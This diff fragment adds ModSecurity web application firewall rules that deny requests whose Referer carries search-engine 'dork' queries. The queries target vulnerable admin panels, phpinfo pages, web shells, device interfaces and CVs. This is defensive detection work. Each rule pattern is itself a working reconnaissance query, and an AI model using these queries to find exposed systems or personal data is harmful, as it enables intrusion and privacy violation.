+SecRule REQUEST_HEADERS:Referer   "\(intitle:adventnet manageengine servicedesk plus\|remember me\. copyright © 2005 adventnet inc\. all rights reserved\.\) in(?:text|body):remember me " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371676,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):fill out the form below completely to change your password and user name\. if new username is left blank" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371706,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:xmail web administration interface in(?:text|body):login in(?:text|body):password" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371763,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:worldclient in(?:text|body):© \(2003\|2004\) alt-n technologies\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371772,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):mail admins login here to administrate your domain\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371804,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):bitboard v2\.0 bitshifters bulletin board" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371812,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:login in(?:text|body):rt is © copyright" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371813,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:novell web services in(?:text|body):select a service and a language\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371815,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:vhost in(?:text|body):vhost \. 2000-2004" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371820,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):storage management server for intitle:server administration" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371822,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "novell netware in(?:text|body):netware management portal version" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371867,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:emule \* intitle:- web control panel in(?:text|body):web control panel enter your password here\." "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371894,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "site:ups\.com intitle:ups package tracking in(?:text|body):1z ### ### ## #### ### #" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371909,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:belarc advisor current profile in(?:text|body):click here for belarc's pc management products" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371929,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):welcome to the web v\.networks intitle:v\.networks \[top\] -filetype:htm " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371936,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   " filetype:log in(?:text|body):connectionmanager2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371945,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "  intitle:sysinfo \*  in(?:text|body):generated by sysinfo \* written by the gamblers\. " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371946,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:cgi in(?:text|body):nrg-  this web page was created on " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371955,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):warning: \* am able \* write \*\* configuration file includes/configure\.php -forums" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372006,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:samba web administration tool in(?:text|body):help workgroup" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372014,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):you to handle frequent configuration jobs easily and quickly \| intitle:show/search other devices" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372069,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):welcome to taurus the taurus server appliance intitle:the taurus server appliance" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372074,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:network\+storage\+link\+for\+usb\+2\.0 disks in(?:text|body):disks user log in \(private data\)   disk \(private data\) flash \(public data\) firmware version  " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372100,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:axis 240 camera server in(?:text|body):server push -help" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372110,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:--- video web server --- in(?:text|body):video web server any time & any where username password " "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372125,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:officeconnect cable/dsl gateway in(?:text|body):checking your browser" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372135,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):please enter correct password for administrator access\. thank you copyright © 2003 smc networks" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:brother in(?:text|body):view configuration in(?:text|body):brother industries" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372158,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:connection status in(?:text|body):current login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372159,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:network print server in(?:text|body):http://www\.axis\.com filetype:shtm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372166,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):videoconference management system ext:htm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372185,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):uaa \(msb\)  lexmark -ext:pdf" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372192,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):ready with 10/100t ethernet" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372193,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(in(?:text|body):mobotix m1 \| in(?:text|body):mobotix m10\) in(?:text|body):open menu shift-reload" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372230,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:flexwatch in(?:text|body):home page ver" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372232,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body): copyright mantisbt group" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372250,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):2000-2001 the phpheaven team" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372322,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):this site is using phpgraphy \| intitle:my phpgraphy site" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372327,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phpinfo in(?:text|body):php version" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372433,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):plink 2\.07" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372585,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):designed by spaceacre" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372607,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):elkagroup  image gallery v1\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372618,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allin(?:text|body):home member search chat room forum help/support privacy policy" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372745,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):© tainos webdesign" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372761,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):remository .* is technology by black sheep research" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372780,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):free ecommerce shopping cart software by viart \+your shopping cart is empty!" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372853,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+
+SecMarker END_RECON_CHECKS_INTEXT
+
+#intitle
+SecRule REQUEST_HEADERS:Referer "intitle:"         "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:333932,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:313793,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_INTITLE"
+SecRule REQUEST_HEADERS:Referer  "intitle.*oscommerce.*inurl.*/admin/configuration\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350127,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable Oscommerce Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "intitle.*horde :: my portal.*\[tickets" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350027,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:myshell 1\.1\.0 build 20010923" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371022,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:yala: yet another ldap administrator" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371023,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:error: the requested url could not be retrieved while trying to retrieve the url the following error was encountered" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371024,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:web data administrator - login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371030,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:php shell.*enable stderr filetype:\.?php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371032,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:admin intitle:login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371035,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phpinfo\(\) \+mysql\.default_password \+zend scripting language engine" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371061,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:apache tomcat error report" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371174,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:default plesk page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371184,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:404 sc_not_found" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371187,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ora-12541: tns:no listener intitle:error occurred" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371195,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:htsearch error ht://dig error" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371200,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:error occurred while processing request \+where \(select\|insert\) filetype:cfm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371201,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:error using hypernews server software" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371202,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:execution of this script not permitted contact phone" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371205,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:error occurred the error occurred in filetype:cfm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371206,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "can't connect to local intitle:warning" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371210,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:under construction does not currently have" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371211,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:500 internal server error server at" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371231,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:the page cannot be found internet information services" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371232,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:the page cannot be found 2004 microsoft corporation" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371233,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:the page cannot be found inetmgr" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371234,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "error diagnostic information intitle:error occurred while " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371241,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:appserv open project \* appserv is a merging open source software installer package -phpbb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371249,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:logrep - log file reporting system -site:itefix\.no" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371250,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:joomla - web installer" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371252,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to f-secure policy manager server welcome page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371259,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:urchin \(5\|3\|admin\) ext:cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371261,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:curriculum vitae filetype:doc" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371264,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:web server status ssh telnet" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371285,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:edna:streaming mp3 server -forums" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371291,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ftp root at" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371294,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome\.to\.squeezebox " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371301,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:multimon ups status page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371306,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:web server statistics for \*\*\*\*" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371331,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:appserv open project -site:www\.appservnetwork\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371332,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:asp stats generator \*\.\* asp stats generator 2003-2004 weppos" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371341,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "phone  \* \* \* address \* e-mail intitle:curriculum vitae" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371362,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to ntop!" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371390,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:system statistics \+system and network information center" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371398,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:big sister \+ok attention trouble" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371401,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
